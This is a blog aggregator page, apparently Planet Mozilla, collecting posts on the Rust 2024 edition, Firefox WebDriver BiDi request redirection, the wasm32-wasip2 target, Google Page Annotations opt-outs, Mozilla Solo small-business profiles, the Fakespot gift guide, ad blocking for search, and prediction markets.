We've been hard at work on Rust 2024. We're thrilled about how it has turned out. It's going to be the largest edition since Rust 2015. It has a great many improvements that make the language more consistent and ergonomic, that further our relentless commitment to safety, and that will open the door to long-awaited features such as gen blocks, let chains, and the never (!) type. For more on the changes, see the nightly Edition Guide.
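
As a taste of one of those features, here is a minimal let-chain sketch; it is illustrative only (not from the Edition Guide) and assumes a nightly toolchain with the let_chains feature gate enabled:

#![feature(let_chains)]

// A let chain: a pattern match and a boolean condition in a single `if`.
fn describe(opt: Option<i32>) -> &'static str {
    if let Some(n) = opt && n > 0 {
        "positive"
    } else {
        "zero, negative, or missing"
    }
}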

As planned, we recently merged the feature-complete Rust 2024 edition to the release train for Rust 1.85. It has now entered nightly beta.[1]

You can help right now to make this edition a success by testing Rust 2024 on your own projects using nightly Rust. Migrating your projects to the new edition is straightforward and mostly automated. Here's how:

  1. Install the most recent nightly with rustup update nightly.
  2. In your project, run cargo +nightly fix --edition.
  3. Edit Cargo.toml and change the edition field to say edition = "2024" and, if you have a rust-version specified, set rust-version = "1.85".
  4. Run cargo +nightly check to verify your project now works in the new edition.
  5. Run some tests, and try out the new features!

(More details on how to migrate can be found here and within each of the chapters describing the changes in Rust 2024.)

If you encounter any problems or see areas where we could make the experience better, tell us about it by filing an issue.

Coming next

Rust 2024 will enter the beta channel on 2025-01-09, and will be released to stable Rust with Rust 1.85 on 2025-02-20.

  1. That is, it's still in nightly (not in the beta channel), but the edition items are frozen in a way similar to it being in the beta channel, and as with any beta, we'd like wide testing.

Firefox Developer Experience: Firefox WebDriver Newsletter 133

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 133 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

We are always grateful to receive external contributions, here are the ones which made it in Firefox 133:

  • Liam (ldebeasi) added an internal helper to make it easier to call commands from the parent process to content processes
  • Dan (temidayoazeez032) updated the error thrown by the browsingContext.print command for invalid dimensions

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi.

WebDriver BiDi

Support for url argument of network.continueRequest

We just added support for the "url" argument of the network.continueRequest command. This parameter, which should be a string representing a URL, allows a request blocked in the beforeRequestSent phase to be transparently redirected to another URL. The content page will not be aware of the redirect, and will consider the response as if it came from the originally targeted URL.

In terms of BiDi network events, note that this transparent redirect will also not lead to additional network.beforeRequestSent events. The redirect count for this request/response will not be increased by this command either. It can be useful if clients want to redirect a specific call to a test API, without having to update the implementation of the website/webapplication.

-> {
  "method": "network.continueRequest",
  "params": {
    "request": "12",
    "url": "https://bugzilla.allizom.org/show_bug.cgi?id=1234567"
  },
  "id": 2
}

<- { "type": "success", "id": 2, "result": {} }

As with other network interception features, using this command and this parameter relies on the fact that the client is monitoring network events and has setup appropriate intercepts in order to catch specific requests. For more details, you can check out the Firefox WebDriver 124 newsletter where we introduced network interception.

Bug fixes

Marionette

Bug fixes

Don Marti: opt out of Google Page Annotations

Ever wish Google had one “opt me out of all Google growth hacking schemes” button that you could click once and be done with it? Me too. But that’s not how it works.

Anyway, the new one is Google Page Annotations: Google app for iOS now injects links back to Search on websites. I really don’t want this site showing up with links to stuff I didn’t link to. The choices of links on here are my own free expression.

This opt-out has two parts and you do need to have a Google Account to do it.

  1. Either set up Google Search Console and add your site(s) as web properties on there, or go to your existing Google Search Console account and get a list of your web properties.

  2. Visit the form: Opt out from Page Annotation in Google App browser for iOS and add your web properties as a comma-separated list. You have to be the Google Search Console owner of the site(s) to do the opt out.

Hopefully this awkward form thing is just temporary and there will be a more normal opt-out with a meta tag or something at some point. I’ll update this page if they make one.

IMHO the IT business had a peak some time in the mid-2000s. You didn’t have to dink with vintage PC stuff like DIP switches and partition tables, but the Internet companies were still in create more value than you capture mode and you didn’t have to work around too many dark patterns either. If I recall correctly, Microsoft did something like this link-adding scheme in Internet Explorer at one point, but they backed off on it before it really became a thing and the opt-out was easier. Welcome to the return of the power user. Oh well, writing up all the individual opt outs is good for getting clicks. The Google Search algorithm loves tips on how to turn Google stuff off.

Related (more stuff to turn off)

fix Google Search: get rid of most of the AI and other annoying features

Google Chrome ad features checklist: turn off tracking and built-in ads in Google Chrome

Block AI training on a web site Right now you can’t block Google from taking your content for AI without also blocking your site from Google Search, but that’s likely to change.

Bonus links

Why the DOJ’s Google Ad Tech Case Matters to You In 2020, as the UK report cited above showed, publishers received only 51% of the money spent by advertisers to reach readers, and about 15% of advertisers’ money seems to just… disappear.

MFA is Programmatic’s Dark Mirror The failure of MFA is not MFA websites. The failure of MFA is that we built an incentive system in programmatic that essentially necessitated their existence. Related: I was invited to Google HQ to talk about my failing website. Here’s how that went.

The Rust Programming Language Blog: The wasm32-wasip2 Target Has Reached Tier 2 Support

Introduction

In April of this year we posted an update about Rust's WASI targets to the main Rust blog. In it we covered the rename of the wasm32-wasi target to wasm32-wasip1, and the introduction of the new wasm32-wasip2 target as a "tier 3" target. This meant that while the target was available as part of rust-lang/rustc, it was not guaranteed to build. We're pleased to announce that this has changed in Rust 1.82.

For those unfamiliar with WebAssembly (Wasm) components and WASI 0.2, here is a quick, simplified primer:

  • Wasm is a (virtual) instruction format for programs to be compiled into (think: x86).
  • Wasm Components are a container format and type system that wrap Core Wasm instructions into typed, hermetic binaries and libraries (think: ELF).
  • WASI is a reserved namespace for a collection of standardized Wasm component interfaces (think: POSIX header files).

For a more detailed explanation see the WASI 0.2 announcement post on the Bytecode Alliance blog.

What's new?

Starting with Rust 1.82 (2024-10-17), the wasm32-wasip2 (WASI 0.2) target has reached tier 2 platform support in the Rust compiler. Among other things, this means it is guaranteed to build and is now available to install via Rustup using the following command:

rustup target add wasm32-wasip2

Up until now, Rust users writing Wasm Components have had to rely on tools (such as cargo-component) which target the WASI 0.1 target (wasm32-wasip1) and package it into a WASI 0.2 Component via a post-processing step. Now that wasm32-wasip2 is available to everyone via Rustup, tooling can begin to directly target WASI 0.2 without the need for additional post-processing.

What this also means is that ecosystem crates can begin targeting WASI 0.2 directly for platform-specific code. WASI 0.1 did not have support for sockets. Now that we have a stable tier 2 platform available, crate authors should be able to finally start writing WASI-compatible network code. To target WASI 0.2 from Rust, authors can use the following cfg attribute:

#[cfg(all(target_os = "wasi", target_env = "p2"))]
mod wasip2 {
    // items go here
}

To target the older WASI 0.1 target, Rust also accepts target_env = "p1".

Standard Library Support

The WASI 0.2 Rust target reaching tier 2 platform support is in a way just the beginning: it means the target is supported and stable. While the platform itself is now stable, support in the stdlib for WASI 0.2 APIs is still limited. The WASI 0.2 specification defines APIs for timers, files, and sockets, among others, but if you try to use the stdlib APIs for these today, you'll find they don't yet work.

We expect to gradually extend the Rust stdlib with support for WASI 0.2 APIs throughout the remainder of this year into the next. That work has already started, with rust-lang/rust#129638 adding native support for std::net in Rust 1.83. We expect more of these PRs to land through the remainder of the year.

That doesn't need to stop users from using WASI 0.2 today, though. The stdlib is great because it provides portable abstractions, usually built on top of an operating system's libc or equivalent. If you want to use WASI 0.2 APIs directly today, you can either use the wasi crate directly, or generate your own WASI bindings from the WASI specification's interface types using wit-bindgen.
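
To give a sense of where this is heading, here is a minimal sketch (not from the announcement) of cfg-gated network code that should become possible on wasm32-wasip2 as the std::net support from rust-lang/rust#129638 rolls out; treat it as an assumption-laden example rather than guidance for today's toolchains:

// Illustrative sketch: WASI 0.2-only code path using std::net,
// assuming the stdlib socket support described above is available.
#[cfg(all(target_os = "wasi", target_env = "p2"))]
fn serve() -> std::io::Result<()> {
    use std::io::Write;
    use std::net::TcpListener;

    // On WASI 0.2, std::net is being built on top of the wasi:sockets interfaces.
    let listener = TcpListener::bind("127.0.0.1:8080")?;
    for stream in listener.incoming() {
        let mut stream = stream?;
        stream.write_all(b"hello from wasm32-wasip2\n")?;
    }
    Ok(())
}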

Conclusion

The wasm32-wasip2 target is now installable via Rustup. This makes it possible for the Rust compiler to directly compile to the Wasm Components format targeting the WASI 0.2 interfaces. There is now also a way for crates to add WASI 0.2 platform support by writing:

#[cfg(all(target_os = "wasi", target_env = "p2"))]
mod wasip2 {}

We're excited for Wasm Components and WASI 0.2 to have reached this milestone within the Rust project, and are excited to see what folks in the community will be building with it!

Frederik Braun: Modern solutions against cross-site attacks

NB: This is the text/html version of my talk from the German OWASP Day 2024 in Leipzig earlier this month. If you prefer, there is also a video from the event.

Title Slide. Firefox logo in the top right. Headline is "Dealing with Cross-Site Attacks". Presentation from Frederik Braun held at German OWASP Day 2024 in Leipzig

This article is about cross-site leak attacks and what recent defenses have been introduced to counter them. I …

The Mozilla Blog: Huwa: From a WhatsApp group to sharing Palestinian olive oil with the world

<figcaption class="wp-element-caption">From left: Omar Saleh Huwaoushi, Bilal Othman Huwaoushi and Maryam Othman Huwaoushi. For the family, Huwa is not just a business — it’s a legacy. Credit: Diane Sooyeon Kang</figcaption>

Diane Sooyeon Kang is a food and travel photographer and writer with a passion for storytelling. She has traveled the world extensively, working with esteemed publications and brands. You can find more of her work at dianeskang.com.

A vibrant spread adorns an overflowing table, filled with precious hand-painted ceramics from Palestine, hummus, yogurt dips, za’atar, and fresh tomatoes and mint picked from the backyard garden. Copious amounts of olive oil fill several bowls and are drizzled over nearly every dish. Tucked between the plates are olive oil squeeze bottles adorned with playful illustrations and stickers.

The olive oil, with a surprisingly fruity yet peppery kick, is none other than Huwa, the Huwaoushi family’s newly launched product, made from handpicked, cold-pressed olives straight from a family-owned olive grove.

“We didn’t want to take ourselves too seriously when making the packaging. Olive oil production, especially in Palestine, has never been a purely serious or somber activity,” shares Bilal Othman Huwaoushi, one of three Huwaoushi siblings involved in creating Huwa. “It’s about families coming together — kids playing, aunts and uncles gathering to pick olives.” This sense of joyful community is mirrored in the brand’s design, which includes playful illustrations of birds, a reference to Palestinian symbols, and even comic-style artwork on the inside sleeve.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

For generations, Bilal’s family has been farming olives in Palestine. This deep-rooted tradition is evident in how the family talks about their land, which has produced olives for as long as they can remember. “The same trees we eat from are the ones my grandfather planted as a kid,” Bilal shares, recounting the heritage of their olive groves and the rare, age-old practices that make their olive oil unique.

When Bilal’s father, Omar Saleh Huwaoushi, a retired cab driver, immigrated to Chicago in the 1980s, he missed the flavors of home, especially the olive oil he grew up with. Unable to find anything like it, he started bringing it back with him. “Our family has been growing olives for centuries, but we’re the first generation to bring this olive oil to the U.S.,” Bilal states. Once their friends got a taste of the oil, they wanted it too. And from there, it took on a life of its own.

As a lower-income family, everyone worked together to build the olive oil side business. Before Huwa was created, the Huwaoushis sold their olive oil in 17-liter tanks through a WhatsApp group chat. Feedback was overwhelmingly positive. “People were telling us this was some of the best oil they’d ever tasted,” Bilal recalls. Since the oil came directly from their uncle’s farm, they were able to offer a premium product at a fraction of the price compared to other premium olive oil brands.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Through its popularity in WhatsApp groups, Bilal saw an opportunity, and they decided to brand it as Huwa. It became a passion project to share his Palestinian heritage with a larger audience and create something meaningful with his immediate and extended family, and for the people in his village.

The olive oil is deeply interwoven with the story of their town called Aqraba, a close-knit village where people remain tightly connected even across generations and continents. As Omar shares, “If you mention my name in the village, everyone knows my family. Even after 40 years abroad, returning feels like I never left.” With over 600 family members across multiple generations, the legacy of togetherness is alive and well, both within the family and in their interactions with the community back home.

Their heritage is celebrated each olive harvest season, when family and friends come together to enjoy freshly pressed oil, often with simple dishes like bread soaked in olive oil with onions and sumac. This ritual, as they explain, is not just a meal; it’s an expression of gratitude for the harvest, a way to reconnect with the land and with each other. “In the winter, we’d bake bread, soak it in olive oil, and sprinkle it with sumac and chicken — it’s such a simple meal, but it brings everyone together.”

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Unlike modern olive harvesting practices that often use pesticides, chemical fertilizers, or pest prevention methods like wrapping trees in plastic, Palestinian farmers rely on multi-generational techniques and agricultural wisdom. Farmers plant fig trees within olive groves to naturally attract pests away from the olive trees, and fertilize the soil only with compost and rely solely on rainfall for irrigation — this preserves soil purity and yields high-quality oil.

“The entire production process is very unique — from the way we handle the soil to how we cold-press the oil,” Bilal says. “While many cultures are defined by their food, our culture is unique in that it’s defined by the food process itself.”

To produce most commercial-grade olive oil, large machines typically shake trees, disrupting the birds inhabiting the trees and causing unripened olives, branches and leaves to fall and get processed together. In contrast, Huwa uses a gentler method: Workers lean ladders against the trees and hand-pick only ripe olives, enhancing both oil quality and ecosystem balance. These are indigenous Aqrabawi practices honed over a thousand years of farming.

The community mill used for pressing ensures fair compensation for everyone involved in the harvest. Olives are cold-pressed at low temperatures, preserving nutrients and enhancing flavor.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

For Bilal’s family, Huwa is not just a business — it’s a legacy. Their uncle, deeply respected in the community for his agricultural knowledge, serves as a critical cornerstone and is one of many keepers of this tradition. Preserving culture, heritage and knowledge is central to Huwa’s mission.

In many ways, Huwa represents a bridge: one that connects Palestinian culture with the American community and preserves an ancient tradition in a modern world. As Huwa continues to grow, the family’s goal is to uphold their heritage while inviting others to experience it through the taste of their olive oil. 

“The entire process has been pretty joyful, but there are so many things that have to be done,” Bilal said. “Content and copywriting have been challenging, so using AI tools has been helpful in that regard. I’d much rather spend that time on the street, having people sample our oil.”

Like many entrepreneurs, Bilal has found that with the support of new technology and tools, tasks that were once time-consuming and tedious have become easier and quicker to complete. Yet, despite the workload, the business’s guiding purpose remains unchanged.

“I think the nice thing about working with your family is that sometimes we decide to just hang out and other times we keep going,” Bilal said. “At the end of the day, the KPI [key performance indicator] for whether we succeed is whether we’re enjoying each other’s company — that’s the guiding principle of how we like to run the business.”


Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out Huwa’s Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post Huwa: From a WhatsApp group to sharing Palestinian olive oil with the world appeared first on The Mozilla Blog.

The Mozilla Blog: La Humita: 20 years of authentic Ecuadorian flavors in Chicago

<figcaption class="wp-element-caption">Nestor Correa founded La Humita in 2003. Later, he hired Chef Juan Esteban, who introduced new dishes focused on Ecuadorian seafood. Credit: Diane Sooyeon Kang </figcaption>

Diane Sooyeon Kang is a food and travel photographer and writer with a passion for storytelling. She has traveled the world extensively, working with esteemed publications and brands. You can find more of her work at dianeskang.com.

When Nestor Correa opened La Humita in Chicago in 2003, he wasn’t just opening a restaurant; he was creating a culinary homage to his family’s heritage and Ecuadorian roots. Named after la humita — a traditional sweet tamale made from ground corn — the restaurant started with recipes passed down through generations, becoming one of the first Ecuadorian restaurants in the city to offer an authentic taste of Ecuador to a diverse audience.

Nestor’s journey into the restaurant world began long before La Humita opened its doors. For over 15 years, he worked as a server at the Marriott Hotel, where he cultivated a deep appreciation for the restaurant industry. “I’ve always had a passion for our cuisine,” Nestor explains. “My mission is to leave something cultural in the city. It’s why I chose to open an Ecuadorian restaurant over other types.” This dedication stems from his childhood, growing up with his mother’s and sister’s homemade recipes that friends and family always praised.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang </figcaption>

La Humita’s initial concept was a high-end dining experience. When it opened in 2003, it quickly gained media attention, appearing in publications like The Chicago Tribune and Chicago Magazine. With a unique menu of Ecuadorian dishes, La Humita quickly became a standout in Chicago’s dining scene, introducing many locals to the richness of Ecuadorian cuisine for the first time. But when the pandemic struck, Nestor faced a major setback. La Humita closed its doors for two years, during which he reevaluated the concept. He attempted to relaunch as La Humita Express, a fast-food version inspired by restaurants like Panda Express, with customizable plates and a simplified approach to serving.

However, this new concept didn’t resonate with his loyal Ecuadorian clientele, who longed for more traditional dishes. “Our community didn’t accept the concept,” Nestor says. “They want specific, traditional dishes.” Realizing that the express concept was not meeting his community’s needs, he restructured the restaurant to honor its original offerings, bringing back traditional plates that felt authentic and comforting. This shift was solidified with the hiring of Juan Esteban, a chef from Quito, Ecuador, who introduced new dishes focused on Ecuadorian seafood, such as shrimp ceviche and the iconic encebollado de pescado (fish soup). “Our chef has brought fresh ideas and traditional flavors,” Nestor shares, crediting this hire with revitalizing La Humita’s menu.

<figcaption class="wp-element-caption">“Our chef has brought fresh ideas and traditional flavors,” Nestor Correa said of Chef Juan Esteban. Credit: Diane Sooyeon Kang </figcaption>

This renewed focus on Ecuadorian authenticity has also allowed La Humita to double down on what sets it apart. “We only serve 100% Ecuadorian cuisine — no Mexican, American or Italian dishes,” Nestor emphasizes. Their approach highlights a distinct culinary identity, one that differentiates Ecuadorian cuisine from other Latin American food, especially with dishes like ceviche, which is boiled instead of cooked in lemon as it’s typically prepared in other countries.

Despite these adaptations, challenges remain, particularly in reaching new customers. “For us, it’s been complicated because our cuisine isn’t as well-known as Italian or Mexican,” Nestor admits. “It’s hard to make Ecuadorian food popular.” Initially, La Humita attracted a mix of local and international patrons, but over the years, its customer base has become primarily Ecuadorian. Now, with a focus on maintaining cultural authenticity, Nestor hopes to regain a wider audience.

One major hurdle to expanding his reach has been the restaurant’s limited digital presence. While they have social media accounts, Nestor acknowledges that without a professional website, they lack visibility. “Many business owners don’t realize how critical a website is,” he says. “But if you don’t have one, or if it’s not up-to-date, you’re missing out. People are looking for information, and not having it can hurt your business.” With this in mind, Correa hopes to build a new website that will better showcase the restaurant’s true identity and give diners a clearer picture of the food and experiences they can expect. Even small changes, like displaying photos of their dishes in the restaurant windows, have made a noticeable difference, drawing in more people from the neighborhood.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

For Nestor, the business is personal. Not only does his family’s legacy influence the menu—his mother’s and sister’s recipes remain unchanged on dishes like la humita and traditional tamales — but his family also plays an active role in the restaurant’s operations. His wife, who is originally from Mexico, learned to cook Ecuadorian food from his mother and sister, and she now works in the kitchen. “We grew up with business in our blood,” Nestor explains. “My wife, my sister, and even my mother, who’s 93, have all helped bring Ecuadorian flavors to life here.”

As Nestor reflects on La Humita’s 20-year journey, he remains steadfast in his commitment to Ecuadorian cuisine. Going digital may help him reach more people, but for Nestor, the heart of La Humita will always be the authenticity and warmth of home-cooked Ecuadorian dishes. And with the support of his family and community, he’s hopeful La Humita will continue to thrive for many years to come.

His vision of sharing Ecuadorian cuisine with Chicago continues to guide him, and he’s excited for what the future holds. “It’s all about sharing my culture through my food,” he says. “Everything we do is a reflection of that.”

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out La Humita’s Solo website here.

The logo features a stylized "S" in purple and red hues with a black oval shape in the center, next to the text "Solo" in bold black font.

Ready to start creating?

Launch your website

The post La Humita: 20 years of authentic Ecuadorian flavors in Chicago appeared first on The Mozilla Blog.

The Mozilla Blog: Diaspora: Where Southern, West African and Caribbean traditions come alive in Chicago

<figcaption class="wp-element-caption">Rob Carter is the founder of Diaspora, a progressive Afrocentric food concept that celebrates Southern, West African and Caribbean flavors. Credit: Diane Sooyeon Kang </figcaption>

Diane Sooyeon Kang is a food and travel photographer and writer with a passion for storytelling. She has traveled the world extensively, working with esteemed publications and brands. You can find more of her work at dianeskang.com.

For Rob Carter, founder of Diaspora, food is a bridge to history, identity and community. Inspired by the rich flavors of Southern, West African and Caribbean cuisines, Diaspora brings Rob’s heritage to life through dishes that tell a story. What started as a pop-up in Chicago has become a platform to share his roots, tackle the challenges of entrepreneurship and prove that food has the power to unite people across cultures and generations.

Growing up in a family where food was central to daily life, Rob’s path into the culinary world began at an early age. “My grandmother was my first mentor, even though she didn’t know it,” he recalls fondly. As a child, he often helped her prepare meals that fed large groups; this instilled in him a deep appreciation for hospitality and the ability of food to bring people together. His grandmother lived with 21 siblings and cousins, making her well-suited to cooking for small crowds. Her Southern cooking became the foundation of Rob’s culinary identity.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

While Rob’s early experiences shaped his love for food, becoming an entrepreneur was not without its challenges. Despite years of working in upscale restaurants, including Michelin-starred Vie Restaurant and stages at Band of Bohemia and Blackbird in Chicago, the leap to running his own business was daunting. “You don’t learn business by working the line,” he says. “You learn by doing, making mistakes, and figuring out what works.”

One of the toughest lessons has been the art of timing. Organizing pop-up events — where crowds are unpredictable and profit margins are tight — has proved to be a learning curve. “I once did a pop-up during Lollapalooza weekend, and it was a disaster,” he recalls. “The city was buzzing with festival-goers, and my event was completely overlooked.” These setbacks, however, have helped him refine his approach, teaching him to be more strategic and adapt when necessary.

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

In addition to timing, Rob’s journey has highlighted the importance of collaboration. Managing partnerships and navigating last-minute cancellations has been a source of stress. “It’s tough when you rely on other people’s schedules, and then they cancel,” he says, referring to a series of collaborations that fell through in June. Yet, these challenges have only fueled his determination to push forward and remain flexible.

Technology has provided a new set of opportunities and challenges. Going digital, especially for a small business with limited resources, can be daunting. But for Rob, the shift is not just about convenience — it’s a way to craft a brand and tell a story. “You have to build a community before you even open your doors,” he shares, describing how Diaspora is leveraging social media to connect with people and create buzz before opening a physical space. The goal is to have a loyal following already in place by the time the doors open, so the business doesn’t have to build momentum from scratch. “People want to know when the space is opening, not when we’re trying to convince them to come. That’s the difference,” he says.

As he continues to grow Diaspora, the chef remains focused on creating meaningful experiences for his guests. Whether through pop-up dinners or catered events, he aims to foster connections and create spaces where people feel part of something special. “It’s about building trust,” he explains. “If people feel like they’re part of something meaningful, they’ll keep coming back.”

Looking to the future, the chef envisions expanding his culinary offerings while also keeping the spirit of collaboration alive. While the idea of a brick-and-mortar restaurant is tempting, the rising costs of rent and food have made him cautious. Instead, he’s focused on continuing to build a strong presence through pop-ups and collaborations before taking the plunge into opening a physical space.

For Rob, this journey is about more than just food; it’s about culture and the connections that can be formed around the table. “I want to create something bigger than just a restaurant,” he says. “It’s about purpose, community and connection.”

<figcaption class="wp-element-caption">Credit: Diane Sooyeon Kang</figcaption>

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out Diaspora’s Solo website here.


Ready to start creating?

Launch your website

The post Diaspora: Where Southern, West African and Caribbean traditions come alive in Chicago appeared first on The Mozilla Blog.

The Mozilla BlogShopping for everyone? We’ve got you covered with the Fakespot Holiday Gift Guide 2024

Fakespot Holiday Gift Guide Great gifts with reliable reviews for everyone on your list

When it comes to gifting, it’s the thought that counts, right? Then why does it feel so terrible when your creative, thoughtfully chosen gift ends up being a total dud? We’re talking glitching karaoke machines, pepper grinders that dump full peppercorns on your pasta, and doll-sized sweaters that you definitely ordered in a women’s size medium.

The fact is, while online shopping has opened up a world of possibilities for gift-givers, it has also created ample opportunities for scammers and bad actors to sell products that don’t live up to their promises. Throw in some shady ranking tactics and AI-generated reviews and suddenly your simple gift search feels like a research project — or game of whack-a-mole.

This year, the Fakespot Holiday Gift Guide is here to help. It showcases products vetted with Fakespot’s product review analysis technology and helps weed out items with untrustworthy reviews. Whoever you’re shopping for — and whatever their age or interest — this guide will help you find quality products backed by reliable customer feedback.

What makes the Fakespot Holiday Gift Guide 2024 stand out?

The Fakespot Holiday Gift Guide is more than just a list of popular products. It’s a curated selection backed by advanced AI technology designed to analyze reviews and ratings across major e-commerce sites like Amazon, Best Buy and Walmart. Fakespot works to protect shoppers from misleading or fake reviews – a common problem during the holiday rush when online shopping activity spikes. 

Every product featured in the Fakespot Holiday Gift Guide has received a Fakespot Review Grade of an A or B, indicating reliable reviews likely written by real customers who left unbiased feedback.

By filtering out products with untrustworthy reviews, the Fakespot Holiday Gift Guide helps you shop smarter and avoid the disappointments of low-quality or misrepresented items. It’s a practical resource for anyone looking to cut through the holiday noise and make more informed purchases. 

Gift ideas for everyone you love (or just like a lot) with the Fakespot Holiday Gift Guide 2024

The guide spans a wide variety of categories, offering options for every type of person on your gift list. Here’s a look at some of the featured categories:

  1. Tech and electronics
<figcaption class="wp-element-caption">Fakespot Review Grade: B</figcaption>
  2. Fitness and outdoors
<figcaption class="wp-element-caption">Fakespot Review Grade: B</figcaption>
  3. Home and kitchen
<figcaption class="wp-element-caption">Fakespot Review Grade: A</figcaption>
  4. Fashion and beauty
<figcaption class="wp-element-caption">Fakespot Review Grade: B</figcaption>
  5. Toys and games
    • Shopping for kids can be a challenge, especially when reviews don’t tell the whole story about safety or durability. This section brings together exciting and interactive options like classic board games, challenging puzzles and engaging card games for all ages.
<figcaption class="wp-element-caption">Fakespot Review Grade: A</figcaption>

Tips for shopping smart this holiday season

Along with gift recommendations, Fakespot offers valuable tips for making the most of online holiday shopping:

  • Trust but verify: Even highly rated items might have fake reviews. Use tools like Fakespot’s browser extension to double-check reviews while shopping on popular sites.
  • Compare prices: The holiday season can bring fluctuating prices. Keep an eye on price trends and consider setting up alerts for big-ticket items.
  • Look beyond ratings: Sometimes a product might have high ratings, but lack detailed, verified reviews. Focus on the authenticity of reviews rather than just on the star rating.

Wrapping up your holiday shopping with confidence

With its carefully selected products and commitment to transparency, the Fakespot Holiday Gift Guide provides an invaluable resource for holiday shoppers. Head over to the Fakespot Holiday Gift Guide and cross “perfect gifts” off your to-do list.


Shop smarter with reliable product reviews for everyone on your list

Check out the Fakespot Holiday Gift Guide

The post Shopping for everyone? We’ve got you covered with the Fakespot Holiday Gift Guide 2024 appeared first on The Mozilla Blog.

Don MartiUse an ad blocking extension when performing Internet searches

The FBI seems to have taken down the public service announcement covered in Even the FBI says you should use an ad blocker | TechCrunch.

Use an ad blocking extension when performing internet searches. Most internet browsers allow a user to add extensions, including extensions that block advertisements. These ad blockers can be turned on and off within a browser to permit advertisements on certain websites while blocking advertisements on others.

This is still good advice. Search ads are full of scams, and you can block ads on search without blocking the ads on legit sites. I made a local copy of the FBI alert.

Why did they take the web version down? Maybe we’ll find out. I sent the FBI a FOIA request for any correspondence about this alert and the decision to remove it.

The Malwarebytes site has more good info on ongoing problems with search ads. Google Search user interface: A/B testing shows security concerns remain

Related

effective privacy tips

SingleFile is a convenient extension for saving copies of pages. (I got the FBI page from the Internet Archive. It’s a US government work so make all the copies you want.)

Bonus links

“Interpreting the Ambiguities of Section 230” by Alan Rozenshtein (Section 230 covers publisher liability, but not distributor liability.)

Confidential OCR (How to install and use Tesseract locally on Linux)

The Great Bluesky Migration: I Answer (Some) Of Your Questions Bluesky also offers a remedy for quote-dunking. If someone quotes your post to make a nasty comment on it, you can detach the quoted post entirely. (And then you should block the jerk). Related: Bluesky’s success is a rejection of big tech’s operating system

Designing a push life in a pull world Everything in our online world is designed to push through our boundaries, usually because it’s in someone else’s financial best interest. And we’ve all just accepted that this is the way the world works now.

Killer Robots About to Fill Skies… (this kind of thing is why the EU doesn’t care about AI innovation in creepy tracking and copyright infringement—they need those developers to get jobs in the defense industry, which isn’t held back by the AI Act.)

Inside the Bitter Battle Between Starbucks and Its Workers (More news from management putting dogmatic union-busting ahead of customers and shareholders, should be a familiar story to anyone dealing with inadequate ad review or search quality ratings.)

National Public Data saga illustrates little-regulated US data broker industry National Public Data appears to have been a home-based operation run by Verini himself. The enterprise maintains no dedicated physical offices. The owner/operator maintains the operations of company from his home office, and all infrastructure is housed in independent data centers, Verini said in his bankruptcy filing.

Cameron KaiserCHRP removal shouldn't affect Linux Power Macs

A recent patch removed support for the PowerPC Common Hardware Reference Platform from the Linux kernel. However, Power Macs, even New World systems, were never "pure" CHRP, and there were very few true CHRP systems ever made (Amiga users may encounter the Pegasos and Pegasos II, but few others existed, even from IBM). While Mac OS 8 had some support for CHRP, New World Macs are a combination of CHRP and PReP (the earlier standard), and the patch specifically states that it should not regress Apple hardware. That said, if you're not running MacOS or Mac OS X, you may be better served by one of the BSDs — I always recommend NetBSD, my personal preference — or maybe even think about MorphOS, if you're willing to buy a license and have supported hardware.

Don Martiprediction markets and the 2024 election link dump

Eric Neyman writes, in Seven lessons I didn’t learn from election day, Many people saw the WSJ report as a vindication of prediction markets. But the neighbor method of polling hasn’t worked elsewhere. More: Polling by asking people about their neighbors: When does this work? Should people be doing more of it? And the connection to that French dude who bet on Trump

The money is flooding in, but what are prediction markets truly telling us? If we look back further, election prediction markets were actually legal in the US from the 1800s to 1924, and historical data shows that they were accurate. There’s a New York Times story of Andrew Carnegie noting how surprisingly accurate the election betting markets were at predicting outcomes. They were actually more accurate before the introduction of polling as a concept, which implies that the introduction of polling diluted the accuracy of the market, rather than the opposite.

Was the Polymarket Trump whale smart or lucky? Whether one trader’s private polling tapped sentiment more accurately than the publicly available surveys, or whether statistical noise just happened to reinforce his confidence to buy a dollar for 40c, can’t be known without seeing the data.

Koleman Strumpf Interview - Prediction Markets & More 2024 was a huge vindication for the markets. I don’t know how else to say it, but all the polls and prognosticators were left in the dust. Nobody came close to the markets. They weren’t perfect, but they were an awful lot better than anything else, to say the least.

FBI raids Polymarket CEO Shayne Coplan’s apartment, seizes phone: source Though U.S. election betting is newly legal in some circumstances, Polymarket is not supposed to allow U.S. users after the Commodity Futures Trading Commission halted its operations in 2022, but its user base largely operates through cryptocurrency, which allows for easy anonymity.

Polymarket Explained: How Blockchain Prediction Markets Are Shaping the Future of Forecasting (Details of how Polymarket works including tokens and smart contracts.)

